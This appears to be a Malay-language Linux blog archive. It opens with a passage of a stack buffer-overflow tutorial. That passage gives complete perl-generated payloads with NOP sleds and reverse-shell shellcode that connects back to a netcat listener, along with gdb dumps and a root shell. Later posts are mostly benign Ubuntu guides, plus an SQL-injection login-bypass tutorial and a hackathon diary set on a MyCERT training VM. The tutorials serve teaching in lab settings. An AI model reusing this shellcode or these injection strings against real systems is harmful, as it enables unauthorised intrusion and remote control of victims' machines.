0xbffff4e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
---Type to continue, or q to quit---
...dipotong....

Skroll sehingga anda nampak deretan 0x41 yang bermaksud "A" dan deretan "0x90" ataupun NOP. Sila pilih address pada NOP sebagai return address untuk shell anda. Sebagai contoh saya pilih 0xbffff4d8. Address anda kebarangkalian besar berbeza dengan address saya. Pilih mana2 address 0x90 selepas deretan 0x41. elakkan memilih address yg hujungnya 00. Yang tiada angka sifar lebih baik.

Kita perlu tukar kepada format little endian utk membolehkan alamat ini diexecute oleh program.

Contoh:

0xbffff4d8

tukar jadi

bf ff f4 d8

tukar jadi

d8 f4 ff bf

\xd8\xf4\xff\xbf

Sekarang kita gantikan "BBBB" dengan "\xd8\xf4\xff\xbf" atau address anda.

Di gdb, masa untuk mengeksploitasi

arahan ini

(gdb) run `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","BBBB"'`

Kita tukar jadi

(gdb) run `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\xd8\xf4\xff\xbf"'`

Sekiranya tiada masalah

(gdb) run `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\xd8\xf4\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/saifool/Desktop/mangkuk `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\xd8\xf4\xff\xbf"'`
process 3371 is executing new program: /bin/dash

Sila lihat netcat anda, contoh output

ak47suk1@ak47suk1-laptop:~/Desktop$ nc -l 12345 -vv
Connection from 192.168.1.5 port 12345 [tcp/*] accepted

Voila! anda sudah dapat shell. Sekarang mari kita cuba guna arahan linux ini

echo "ID mangsa:";whoami;echo "ID penuh:";id;echo "Folder sekarang:"; pwd;echo "Kernel Linux:"; uname -a;echo "Maklumat Distro:"; lsb_release -a;exit

Contoh output:

ID mangsa:
saifool
ID penuh:
uid=1000(saifool) gid=1000(saifool) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(saifool)
Folder sekarang:
/home/saifool/Desktop
Kernel Linux:
Linux saifool-laptop 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
Maklumat Distro:
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 10.04 LTS
Release: 10.04
Codename: lucid

Sekarang kita cuba eksploitasi tanpa gdb dengan melaksanakan program mangkuk dengan akses root :D

(gdb) q

saifool@saifool-laptop:~/Desktop$ sudo su
root@saifool-laptop:/home/saifool/Desktop# ./mangkuk `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\xd8\xf4\xff\xbf"'`
Segmentation fault
root@saifool-laptop:/home/saifool/Desktop#

Oppps, error. Kenapa ye? Sebab return address bertukar. Sekarang kita ulangkaji balik untuk mencari return address untuk root

sebagai root, di terminal taip

gdb mangkuk

(gdb) run `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

(gdb) x/2000xb $esp

...dipotong....

---Type to continue, or q to quit---
0xbffff6c0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6c8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6d0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6d8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6e0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6e8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6f0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6f8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff700: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff708: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff710: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff718: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff720: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff728: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff730: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff738: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff740: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff748: 0x41 0x41 0x41 0x41 0x90 0x90 0x90 0x90
0xbffff750: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff758: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff760: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff768: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff770: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff778: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff780: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
... dipotong ....

Anda perasan kan address berbeza dari user biasa. Sekarang saya pilih 0xbffff768. Dalam little endian menjadi \x68\xf7\xff\xbf.

Sekarang kita dah jumpa address untuk root.

(gdb) q

untuk keluar dari gdb

Oh ya, Jangan lupa untuk listen netcat di host anda dengan arahan "nc -l 12345 -vv" terlebih dahulu.

di terminal taip

./mangkuk `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x68\xf7\xff\xbf"'`

Sekarang lihat di netcat anda di host, cuba laksanakan arahan untuk user biasa tadi :)

ak47suk1@ak47suk1-laptop:~/Desktop$ nc -l 12345 -vv
Connection from 192.168.1.5 port 12345 [tcp/*] accepted
echo "ID mangsa:";whoami;echo "ID penuh:";id;echo "Folder sekarang:"; pwd;echo "Kernel Linux:"; uname -a;echo "Maklumat Distro:"; lsb_release -a
ID mangsa:
root
ID penuh:
uid=0(root) gid=0(root) groups=0(root)
Folder sekarang:
/home/saifool/Desktop
Kernel Linux:
Linux saifool-laptop 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
Maklumat Distro:
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 10.04 LTS
Release: 10.04
Codename: lucid

Sekian, Terima Kasih. Sekiranya anda ada kemusykilan, silakan bertanya dengan memberikan komentar. Elakkan bahasa singkatan yang keterlaluan untuk memudahkan kefahaman saya. Terima kasih. Jangan lupa untuk membaca rujukan yang disertakan sekali di bawah.

Rujukan dan Bacaan Tambahan

http://www.packetstormsecurity.org/papers/attack/Preddy-tutorial.txt [Accessed June 26,2010]

Foster, J.C., 2005. Buffer overflow attacks: detect, exploit, prevent, Syngress Media Inc.

https://secure.wikimedia.org/wikipedia/en/wiki/Buffer_overflow [Accessed June 26,2010]

OWASP_Top_10_2007.pdf. Available at: http://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf [Accessed April 16, 2010].

Balaban, &., Buffer Overflows Demystified, Enderunix.org. Available at: http://www.securityforest.com/downloads/educationtree/bof-eng.txt [Accessed June 26, 2010].

Klein, &., 2004. Buffer Overflow, Available at: http://c0re.23.nu/~chris/presentations/overflow2005.pdf [Accessed June 26, 2010].

Tutorial: Pasang wvdial secara luar talian (offline) untuk Ubuntu Lucid Lynx 64-bit dan 32-bit

2010-06-16T16:37:00.006+08:00

Assalamualaikum dan Salam sejahtera,
Terlebih dahulu saya ingin memohon maaf di atas ketiadaan pos selama 3 bulan. Saya agak sibuk akhir-akhir ni dengan tesis dan hal-hal lain. Kali ni saya ingin menerangkan kaedah untuk memasang wvdial secara luar talian.

Kalau pasang secara dalam talian memang tidak sesusah mana. Anda cuma perlu "sudo apt-get usb-modeswitch wvdial" sahaja di terminal. Bagaimana kalau anda tiada talian internet atau hanya jalur lebar mudah alih (mobile broadband) itulah satu-satunya cara anda berada dalam talian (online)?

Dalam keadaan beginilah, tutorial ini sangat-sangat berguna.

1. Muat turun pakej wvdial untuk Ubuntu Lucid Lynx 10.04 64-bit di sini. Untuk Ubuntu Lucid Lynx 10.04 32-bit, ambil sini.

2. Ekstrak/Nyahmampat ke mana-mana yang folder anda suka.

3. Pasang libuniconf4.6_4.6.1-1_amd64.deb, libwvstreams4.6-base_4.6.1-1_amd64.deb, libwvstreams4.6-extras_4.6.1-1_amd64.deb, wvdial_1.60.3_amd64.deb, usb-modeswitch-data_20100127-1_all.deb, usb-modeswitch_1.1.0-2_amd64.deb. Pastikan ikut susunan yang saya nyatakan.

Untuk 32-bit, ikuti langkah yang sama;libuniconf4.6_4.6.1-1_i386.deb, libwvstreams4.6-base_4.6.1-1_i386.deb, libwvstreams4.6-extras_4.6.1-1_i386.deb, wvdial_1.60.3_i386.deb, usb-modeswitch-data_20100127-1_all.deb, usb-modeswitch_1.1.0-2_i386.deb. Pastikan ikut susunan yang saya nyatakan.

4.Dah selesai? Tiada masalah? Bagus,Sekarang masa untuk mengubahsuai usb-modeswitch.conf dan wvdial.conf
usb-modeswitch.conf tak perlu ubah apa-apa sekiranya anda menggunakan huawei E1550. Anda boleh abaikan langkah 5 dan 6.

Sekiranya anda menggunakan Huawei model lain, sila buka usb-modeswitch.conf dengan gedit dan buka terminal anda.
di Terminal, taip

lsusb

seperti gambar di bawah:

5. Dari gambar di atas anda akan dapat lihat senarai usb yang sedang anda pasang pada pc. Untuk keputusan yang terbaik, cabut peranti usb lain dan biarkan modem huawei anda sahaja. Kedudukan huawei saya itu sekadar contoh sahaja. Modem anda mungkin dikenalpasti sebagai "Huawei" atau "Unknown". Paling penting peranti anda dikenalpasti.

6. Sekarang buka usb-modeswitch.conf . Skrol hingga ke seperti anda lihat pada gambar dibawah:

ikut seperti dalam gambar. pastikan nombor tersebut ditulis dalam format 0x1001.

7. Sekarang buka wvdial.conf dengan gedit

Macam biasa ikut apa yang ada dalam gambar di atas.

8. Sekarang tekan Alt+F2, taip

gksudo nautilus

9. Pergi ke folder wvdial tadi di nautilus root, copy fail wvdial.conf dan usb-modeswitch.conf ke folder /etc

10. Anda sudah selesai memasang driver modem anda. Sekarang di terminal. sila taip

usb_modeswitch

sudo wvdial

11. Anda sudah boleh melayari internet. Sekiranya ada masalah, jangan segan-segan untuk memberikan komen bertanya.

Sabily 10.04 Minaret Beta

2010-06-16T14:23:00.000+08:00

Assalamualaikum dan Salam sejahtera,

Sesiapa yang berminat untuk mencuba Sabily 10.04 beta, boleh download dari link di bawah

http://www.wuala.com/jmehdi/DVD%20ISO%20files/10.04/sabily-10.04-beta-desktop-i386.iso

http://94.23.239.117/sabily/sabily-10.04-beta-desktop-i386.iso

Tetapan wvdial untuk Maxis Prepaid Broadband

2010-02-28T17:54:00.003+08:00

Ulasan: Ubuntu 9.10 Karmic Koala

2009-11-22T20:51:00.015+08:00

Salam sejahtera kepada semua pengunjung Blog Sabily Untuk Malaysia,

Mungkin agak terlewat bagi saya untuk membuat sedikit ulasan dan berkongsi dengan anda semua tips-tips dan perisian yang saya cadangkan anda patut pasang di komputer anda.

Saya telah mencuba dua versi Ubuntu, Ubuntu Karmic dan Xubuntu Karmic. Malangnya banyak fungsi yang ada pada Gnome yang tidak ada dalam Xfce membuatkan saya hanya dapat bertahan selama seminggu sahaja dengan Xubuntu.

Xubuntu cukup berguna untuk komputer-komputer lama yang berprestasi rendah dan saya yakin mereka yang sukakan sistem operasi yang mempunyai fungsi ringkas akan menyukainya.

Saya memasang Ubuntu 9.10 pada komputer riba saya, Acer Aspire 4520.

Ubuntu menggunakan sistem fail Ext4 dan menggunakan GRUB2 untuk mengurus rekod boot. Saya dengar ramai yang merungut mengenai GRUB2 jika membuat dwi-boot atau tri-boot pada komputer mereka.

Sekiranya anda membuat dwi-boot, saya tak berapa galakkan anda untuk kemaskini melainkan anda menggunakan Ubuntu sebagai sistem operasi utama anda.

Perubahan yang saya dapat perhatikan pada Ubuntu Karmic:

- Network manager dengan Driver wireless yang lebih stabil. Tiada lagi masalah Network Manager. Wireless boleh diaktifkan dan dimatikan dengan butang wireless pada laptop macam di Windows.

- Tiada konflik peralatan wireless sekiranya anda menggunakan adapter wireless USB.

- Prestasi boot dan startup yang lebih pantas

- Proses pemasangan yang lebih mudah dengan slideshow semasa proses pemasangan.

- Simpanan data sebanyak 2GB percuma menggunakan akaun Launchpad dan Ubuntu One.

- Empathy menggantikan Pidgin. Tapi saya tak berapa suka dengan Empathy. Saya buang Empathy dan gantikan semula dengan Pidgin.

Jangan lupa untuk upgrade semua repositori dan perisian anda.

Perisian yang saya cadangkan untuk anda semua pasang di Ubuntu Karmic:

Ubuntu Tweak

Cara memasang.

Buka Terminal anda.

Taip

sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com FE85409EEAB40ECCB65740816AF0E1940624A220

Tekan enter.

Taip

sudo gedit /etc/apt/sources.list

tambahkan dua baris ayat berikut ke bahagian bawah sekali fail sources.list

deb http://ppa.launchpad.net/tualatrix/ppa/ubuntu karmic main
deb-src http://ppa.launchpad.net/tualatrix/ppa/ubuntu karmic main

kemudian simpan dan tutup gedit.

Taipkan

sudo apt-get update
sudo apt-get install ubuntu-tweak

di Terminal anda.

Di Ubuntu tweak ni, ada macam-macam repositori yang berguna untuk anda. Saya akan terangkan dalam posting akan datang. Dan juga perisian-perisan lain.

Jangan lupa untuk pasang "ubuntu-restricted-extras" untuk memudahkan anda melakukan tugasan di Ubuntu.

Taip di Terminal.

sudo apt-get install ubuntu-restricted-extras

Sekian untuk posting kali ini.

P/S: Saya akan tambah lagi memandangkan sekarang musim cuti semester. Dah lama sangat tak kemaskini blog.

Bunga api merdeka guna bash script

2009-08-28T17:00:00.005+08:00

http://pastebay.com/43087

Simpan kod dalam format fail *.sh

Buka terminal

pergi ke direktori simpanan bunga-api.sh sebagai contoh

taip

chmod +x bunga-api.sh; ./bunga-api.sh

Selamat menyambut hari kebangsaan ke - 52.

Tutorial: Guna Ultrasurf di Ubuntu dengan Crossover Office Professional

2009-08-01T11:59:00.016+08:00

Penetapan CrossOver

1. Pergi ke Applications > CrossOver > Configuration

2. Lihat nama yang digunakan untuk default bottle anda di CrossOver. Dalam gambar di bawah adalah "newbottle".

3. Pergi ke folder default bottle crossover anda. Lokasi CrossOver saya di /home/ak47suk1/.cxoffice/newbottle

4. Disebabkan "newbottle" menggunakan Windows XP sebagai asasnya, saya salin dua fail di bawah iaitu mfc42.dll dan msvcp60.dll dari Windows XP asli. Elakkan untuk memindah turun kedua2 fail tersebut dari Internet.

Letakkan salinan kedua-dua fail tersebut di folder system dan system32 bottle anda. Sebagai contoh:

/home/ak47suk1/.cxoffice/newbottle/drive_c/windows/system/

/home/ak47suk1/.cxoffice/newbottle/drive_c/windows/system32/

Jalan Pintas Ke UltraSurf

Klik kanan pada Desktop, Pilih create launcher.

Masukkan arahan berikut ke ruang teks Command,

/opt/cxoffice/bin/wine /Lokasi Ultrasurf anda/u95.exe

Klik dua kali pada launcher tersebut.

Tunggu dalam 30 saat, Ultrasurf akan dijalankan.

Set 127.0.0.1 dan port 9666 pada setting Network firefox anda. Sila rujuk tutorial Tor sebelum ini.

Silat SQL: Pengenalan dan Suntikan Asas Secara Umum Bahagian 2

2009-06-14T13:31:00.016+08:00

Salam sejahtera semua,

Sebelum anda memulakan tutorial ini, sila dapatkan MyCERT-Training Virtual Machine terlebih dahulu. Anda boleh gunakan VMWare Server / VMWare Workstation untuk load VM ini.

File: MyCERT-Training.7z.001

Download Link: http://www.usaupload.net/d/dp06moc8r9e

File: MyCERT-Training.7z.002

Download Link: http://www.usaupload.net/d/k6dmpzymbcd

File: MyCERT-Training.7z.003

Download Link: http://www.usaupload.net/d/fy06bqfe5h1

File: MyCERT-Training.7z.004

Download Link: http://www.usaupload.net/d/tysno7knh40

md5 hash:

14e48737997597a3752ab1004771cb97 MyCERT-Training.7z.001
7b69585f8a098a78714d26c06a1c88de MyCERT-Training.7z.002
7a2e3472963eb36c6ded0b84cd5cdbb1 MyCERT-Training.7z.003
b393ee2c9415c35816966d2a661714a3 MyCERT-Training.7z.004

pass log masuk VM

username: training
password: analystanalyst

pass archive:

Analysis1 : Analysis1
Analysis2 : Analysis202
Bonus: Bonus303

==================================================================

1. Log masuk ke MyCERT Training VM.

pass log masuk VM

username: training
password: analystanalyst

2. Buka Firefox dan layari, http://localhost/training/sql/demo/index.php

3. Klik login, dan masukkan kata sql ' or 1=1 -- seperti dalam gambar.

4. Hasilnya. Hmmmm......

5. Cuba yang ini pula. 'or'1'='1

6. Hasilnya

Catatan Hari Hackathon MSCOSCONF2009

2009-06-03T13:44:00.007+08:00

Assalamualaikum dan Salam sejahtera,

Pada 31 Mei lepas, saya berkesempatan untuk menghadirkan diri ke Hari Hackathon MSCOSCONF2009. Saya akan berkongsi pengalaman saya dengan anda semua yang mengunjungi blog ini. :) Saya tulis dalam bentuk diari perjalanan untuk memudahkan pembacaan.

8.00 a.m.

Tiba di Berjaya Times Square bersama seorang rakan. Awal lagi. Lepak di Restoran belakang Sungei Wang Plaza untuk sarapan pagi.

9.00 a.m.

Jumpa rakan-rakan yang selama ini dikenali secara atas talian sahaja di forum-forum internet di Starbucks. Pergi bersama mereka untuk bersarapan pagi dan berbual-bual kosong.

9.45 a.m.

Daftar di kaunter. Ramai jugak orang. Setengah jam beratur, baru selesai. Kalau boleh daftar awal lagi kan bagus.

10.15 a.m.

Duduk di barisan antara yang paling belakang. Tak nampak sangat skrin LCD tu. Dengar jelah Encik Mahmud bentangkan serba sedikit mengenai ancaman siber dan intro mengenai peranan MyCERT.

Diperjelaskan penglibatan MyCERT dalam pelbagai organisasi seperti The Honeynet Project,PhishTank, Conficker Working Group dan agensi-agensi lain di dalam dan luar negara.

11.00 a.m.

Masa rehat sebentar sebelum masuk sesi hands-on. Jenguk-jenguk Install Fest Track. Tak ramai sangat orang, tidak seperti yang saya jangka. Mungkin kurang promosi atau sebab hari minggu atau ada urusan lain? Jenguk Booth Fedora, OpenSuse, OpenSolaris, Ubuntu (paling ramai, ada sesi macam mana nak install sotware dengan Synaptics Package Manager), akhir sekali Booth FreeBSD/PCBSD.

Bersembang dengan ahli komuniti FreeBSD/PCBSD dan saya bertanya mengenai FreeBSD/PCBSD dari segi GUI, nak install software dan lain-lain soalan yg biasa ditanya oleh seorang newbie FreeBSD.

Laa, Matthew Orlander ada kat sini rupanya. Terkesima jugaklah dapat berbual dengan core developer FreeBSD sendiri. Beliau cerita mengenai pengalaman beliau dalam FreeBSD sejak 70an dan ceritakan bagaimana FreeBSD yang menggunakan GNOME sebagai GUI, sehinggakan FreeBSD mendapat jolokan "poor man Macintosh". Saya diberitahu OSX banyak gak cilok idea dari FreeBSD. Hehehehe :D. Namapun sumber terbuka, sesiapa pun boleh guna, ye tak ;)

Perasan Trunasuci Arafat, tapi sebab tak berapa kenal beliau, segan pulak nak tegur.

Waktu rehat dah habis. Pergi balik ke Manhattan 3

11.20 a.m.

Sambungan sesi trek Cybersecurity. Pembentangan Masalah keselamatan Aplikasi web yang biasa dijumpai. Sekejap je slide tu sebab pihak Cybersecurity nak lebihkan kepada hands-on training. Ada masalah sedikit. Ramai yang tak ada VMWare server untuk load imej VM MyCERT Training. Saya adalah installer VMWare Workstation tapi versi Linux ;). Ramai yang keluar sama ada tak bawa notebook/netbook, tak install VMWare Server dan sebab-sebab lain.

Ada sahabat saya yang ada installer VMWare Server tapi versi Linux juga, ramai yang di dalam dewan pakai Windows. Akhirnya berlarutan sampai waktu rehat tengah hari dek nak install VMWare pada notebook mereka yang belum install dan mereka yang baru nak tahu bagaimana nak guna VMWare.

12.30 pm

Rehat makan tengah hari. Saya tengok semacam je tulang dan daging dalam sup tu. Kepala otak dah fikir benda yang tak sedap didengar. Tak nak takut syubhat, tengok apa yang di tulis kat kertas bawah bekas lauk tu. "Oxtail Soup". Ceh, bikin saspens je.

Dah saya tersebut di mulut, sampai di telinga seorang ahli komuniti Fedora Malaysia. Dia beritahu saya bahawa sikap berhati-hati tu memang perlu. Hmmmm.... betul juga.

Lepas makan, rehat-rehat.

2.00 pm

Hands-on training bermula. Sesi "Analysing Compromised Web Server:RFI". Tangan dah gatal nak menembak pelayan web tu dengan RFI. Ada masalah dengan skrip php yang sepatutnya vulnerable dengan RFI. dalam sibuk-sibuk nak betulkan skrip php tu, saya cuba-cuba LFI. LFI boleh pulak lepas. memang la, RFI dan LFI lubangnya sama tapi kaedahnya berbeza. sahabat sebelah saya pun tumpang sekaki, try juga baca /etc/passwd server tu. Sekali En. Mahmud perasan masa beliau tangah berpusing-pusing sekitar dewan tu. Orang suruh test RFI, dia test LFI =))

Masa hands-on ni ada buat ala CTF. Siapa yang dapat jumpa flag dahulu, dapat hadiah Pendrive Sliq 2GB dari Cybersecurity. Saya dan sahabat saya cuba, tapi kami silap sebut ada 6 fail dalam folder rfi/temp/. Tak perasan nama fail kedua tu ada jarak ruang kosong.

Seseorang jejaka bernama Adam tampil memberikan penyelesaian unik beliau. Beliau guna code injection x silap. Memang saya saspek, silap respek. Kalau Adam terbaca post ni, sila-silakanlah perkenalkan diri anda :D

3.45 pm

Rehat minum petang. Saya tak keluar. Takut meja 'dirampas'. :lol:

4.00 pm

Sesi "Analysing Compromised Web Server:SQL Injection". Pembentangan pertama adalah kaedah suntikan SQL asas untuk MySQL. Seperti mana yang saya jelaskan dalam Silat SQL: Pengenalan dan Suntikan Asas Secara Umum, cuma ada sedikit penambahan. Saya akan ceritakan lebih terperinci dalam artikel akan datang. Sesi hands-on untuk sesi ini bermula dengan cabaran untuk mendapatkan signature pengguna teratas di dalam pangkalan data Bank of MyCERT, aplikasi web vulnerable di dalam imej VM MyCERT Training.

Dalam masa tidak sampai seminit, saya terus angkat tangan. Alamak, tak perasan ke? Akhirnya bila ada orang lain yang angkat tangan baru En Hafiz perasan. Dapatlah juga cenderamata sebagai kenang-kenangan Hari Hackathon ni. Pendrive S.L.i.q 2 GB yang diberi kerana mennyahut cabaran SQLi (SQL injection). Dekat-dekat je bunyinya. Kebetulan ;)

Seterusnya, analisis 1, analisis 2 dan Bonus. Sahabat sebelah saya nak jawab soalan Bonus tu tapi tak sempat.

5.00 pm

Sesi "Analysing Compromised Web Server:Code Injection". Menggunakan vulnerable php di dalam VM MyCERT training.

5.45 pm

Tamat.

=============================================
Glosari

GUI - graphical user interface. Seperti biasa, rujuk sini http://en.wikipedia.org/wiki/GUI

RFI - Remote File Inclusion http://en.wikipedia.org/wiki/Remote_File_Inclusion

LFI - Local File Inclusion atau dikenali juga sebagai Include File Injection. http://en.wikipedia.org/wiki/Code_injection#Include_File_Injection

SQL - Structured Query Language http://en.wikipedia.org/wiki/SQL

VM - Virtual Machine

CTF - Capture The Flag.
=============================================

Kepada sesiapa yang berhajat.

File: MyCERT-Training.7z.001

Download Link: http://www.usaupload.net/d/dp06moc8r9e

File: MyCERT-Training.7z.002

Download Link: http://www.usaupload.net/d/k6dmpzymbcd

File: MyCERT-Training.7z.003

Download Link: http://www.usaupload.net/d/fy06bqfe5h1

File: MyCERT-Training.7z.004

Download Link: http://www.usaupload.net/d/tysno7knh40

md5 hash:

14e48737997597a3752ab1004771cb97 MyCERT-Training.7z.001
7b69585f8a098a78714d26c06a1c88de MyCERT-Training.7z.002
7a2e3472963eb36c6ded0b84cd5cdbb1 MyCERT-Training.7z.003
b393ee2c9415c35816966d2a661714a3 MyCERT-Training.7z.004

pass log masuk VM

username: training
password: analystanalyst

pass archive:

Analysis1 : Analysis1
Analysis2 : Analysis202
Bonus: Bonus303

Sambungan Silat SQL akan menggunakan Bank of Mycert yang terdapat di dalam MyCERT VM (http://localhost/training/sql/demo/index.php) sebagai contoh bagaimana kita boleh mengeksploitasi laman web yang terdapat lubang SQL dan melepasi (bypass) sistem pengesahan log masuk.

Mengapa Saya Pilih Sabily? (Dikemaskini)

2009-05-24T16:04:00.000+08:00

Assalamualaikum dan selamat sejahtera semua,

Sudah genap dua bulan rasanya saya menggunakan Sabily (Ubuntu Muslim Edition). Pelbagai masalah yang saya telah tempuh sepanjang dua purnama namun untuk berpatah balik ke Windows tidak sekali-kali.

Tidak adil rasanya untuk membandingkan sistem operasi propreitary dengan sistem operasi sumber terbuka, seperti membandingkan epal dengan oren. Namun begitu, Sabily tetap mempunyai pelbagai keistimewaan yang tidak ada pada sistem operasi propreitary seperti Windows.

Selain perisian yang sudah disertakan sekali dengan Ubuntu yang asal seperti OpenOffice.org,Scribus,Pidgin,Brasero,Rythmbox dan GIMP sebagai contoh, Sabily disertakan perisian Islamik seperti Zekr,Minbar,Hijri, Monajat dan Ensiklopedia Thwab.

Juga disertakan perisian pendidikan Gcompris, Brasero (tapi saya lebih suka K3b) untuk burn CD/DVD atau buat imej ISO,codec untuk audio/video, VLC Media Player, dan perisian Sistem Operasi Virtual, VirtualBox OSE yang membolehkan anda menjalankan sistem operasi Windows di dalam Sabily dan tidak lupa juga Compiz Fusion, efek desktop yang dicemburui oleh pengguna Windows :D.

Di sini saya sertakan beberapa screenshot untuk tatapan anda. Sila klik pada gambar utk gambar yg lebih jelas.

Zekr

Minbar Prayer Times

Pray Times! (Add-on Firefox)

Compiz Fusion

K3b

